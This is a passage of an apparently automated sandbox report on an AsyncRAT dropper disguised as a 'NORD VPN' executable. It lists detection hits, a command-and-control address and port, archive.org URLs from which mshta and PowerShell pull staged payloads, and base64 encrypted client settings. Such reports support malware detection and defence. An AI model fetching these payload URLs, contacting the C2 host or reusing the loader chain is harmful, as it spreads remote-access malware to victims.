"hb4rbDi2yorRia4zVii6fBe5zR5qZuT/oNzKkm5RCPxVI+DpAg6tP0HKmjqKbYbfXixb6DODIWmirNXfb6RavFFZFj5L1BSmGSCWmeVDM/IkG1v7H8053Uky0QHQ2bPzEIhio/2bZG7nxydLDiWz7jOA5hTZddxPN8Br/tFDBgOA2YvoFolDN/SyqFz61tucLLLKImugUQPB4sHE/xkAyXi1gtGQ/16xTSWjEKwIRYr/7rvSmfWpY/5oDiJvkWS/1MZAIQNLY1fyi9FRErVVeUnnTikLjZhOkouk7/QdJsJez78RuLjg+I5tTMBYhxG6q81sg7SrqotPY0sK3ZZAKaU4Vrmy1LKrBMpNQv3JiIWlI/lS56GB2bN/TA9sLcKAATEeWREuz8l/bJURfyZFk91OWqZ1mHwEXQGj5Wttm8jf+gG2TbMHgCPcpwFUFMqB7fSQIKv+pU1KOAvU64CUeLTzks4X5N8aHvduxLez78VMAyXSa2PWbv9znaxZZWCGScStHepOMiR4AXViv5F4HTb8v2nZ2x60Q0rMNmZ3T1yMA+WbdCeNBQDFD8roIU7iXGsheZ3Cfnd9MOYde+KESXBKyoZGdGoocdgu9NTzxVBAZ9fOUEXjXRfS6fh+dnAJc0GNGimVg/1EX6Q+xeKnpb2b73IU7G28wz78gQndt1Y=", "Group": "Default"}
          Source: 23.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 216.230.75.62:1107 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 216.230.75.62:1107
          Source: Joe Sandbox ViewIP Address: 207.241.227.126 207.241.227.126
          Source: Joe Sandbox ViewIP Address: 207.241.227.112 207.241.227.112
          Source: Joe Sandbox ViewIP Address: 207.241.224.2 207.241.224.2
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownTCP traffic detected without corresponding DNS query: 216.230.75.62
          Source: unknownDNS traffic detected: queries for: ia601502.us.archive.org
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: http://archive.org
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
          Source: powershell.exe, 00000003.00000003.207486771.0000027D9F6B6000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmpString found in binary or memory: http://crl.goi
          Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: powershell.exe, 00000003.00000002.478183437.0000027D87F0E000.00000004.00000001.sdmpString found in binary or memory: http://ia601406.us.archive.org
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: http://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.484556145.0000027D9F8E4000.00000004.00000001.sdmpString found in binary or memory: http://microsoft.co
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
          Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.472135094.0000027D871C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://archive.org
          Source: powershell.exe, 00000003.00000002.477635897.0000027D87D15000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478302181.0000027D87F6C000.00000004.00000001.sdmpString found in binary or memory: https://archive.org/download/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://archive.orgx
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.480627087.0000027D88C97000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org
          Source: powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/32/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.472681637.0000027D873CF000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt
          Source: powershell.exe, 00000003.00000002.477673861.0000027D87D1D000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org/9/items/server-lol-123_20210603/Server_lol123.txt0ywI
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.org8
          Source: powershell.exe, 00000003.00000002.478105936.0000027D87EC6000.00000004.00000001.sdmpString found in binary or memory: https://ia601406.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmp, xGrfj8RvYg.exeString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...
          Source: mshta.exe, 00000002.00000002.216688146.0000020091B21000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt...7l
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt0
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt1
          Source: mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtC:
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtQ
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtf
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txto
          Source: mshta.exe, 00000002.00000002.216513449.0000020091A66000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtr
          Source: mshta.exe, 00000002.00000002.216764785.0000020091CE0000.00000004.00000040.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txts
          Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtst-MC:
          Source: xGrfj8RvYg.exe, 00000000.00000002.199598225.0000000002B51000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.216487813.0000020091A30000.00000004.00000020.sdmpString found in binary or memory: https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtx
          Source: powershell.exe, 00000003.00000002.477168577.0000027D87BD2000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org
          Source: powershell.exe, 00000003.00000003.210047788.0000027D9F8AB000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/
          Source: powershell.exe, 00000003.00000003.207800027.0000027D9F706000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items
          Source: mshta.exe, mshta.exe, 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/AL
          Source: PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt.3.dr, Clean_lol123[1].txt.2.drString found in binary or memory: https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org
          Source: powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.org/9/items/run-02-02-02/Run_02_02_02.TXT
          Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmpString found in binary or memory: https://ia803408.us.archive.orgx
          Source: mshta.exe, 00000002.00000002.216563943.0000020091AC3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comq
          Source: powershell.exe, 00000003.00000002.482180457.0000027D97365000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownHTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow created: window name: CLIPBRDWNDCLASS

          System Summary:

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDAE0E57
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB25E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEDBB15ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACD5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC9530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC8C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02ACF298
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 23_2_02AC8918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141F5F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141D5A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141B8FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 25_2_0141DB78
          Source: xGrfj8RvYg.exe, 00000000.00000002.199383295.0000000000F10000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000000.196616953.00000000008C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199294357.0000000000E2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exe, 00000000.00000002.199463500.0000000000F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs xGrfj8RvYg.exe
          Source: xGrfj8RvYg.exeBinary or memory string: OriginalFilenameNORD VPN.exe2 vs xGrfj8RvYg.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscorjit.dll
          Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: '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'
